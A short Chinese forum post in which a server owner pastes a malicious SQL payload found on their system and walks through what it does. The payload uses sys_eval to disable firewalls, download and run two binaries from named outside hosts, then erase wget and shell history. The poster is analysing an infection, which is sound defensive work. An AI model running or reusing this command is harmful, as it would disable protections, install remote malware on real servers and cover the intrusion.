首页 > 分析一条sql,大家看看是什么鬼的,map注入吗?

分析一条sql,大家看看是什么鬼的,map注入吗?

select sys_eval('/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cp /usr/bin/wget .;chmod +x wget;./wget -P ./dbms_temp http://game918.me:2545/websevrer;chmod 0755 ./dbms_temp/websevrer;./dbms_temp/websevrer;./wget -P ./db_temp http://198.55.103.12:280/huang;chmod 0755 ./db_temp/huang;./db_temp/huang;rm -rf wget;history -c;')

linux命令我看得懂

第一步关闭了所有类型的防火墙,

第二步wget提权

第三步get一个应用程序 webserver 运行

第四步get一个应用程序 huang 运行

第五步删记录


好吧,被人挂马了,坑爹。。。。。


是我错觉吗...木马好像就是这么几步流程......

【热门文章】
【热门文章】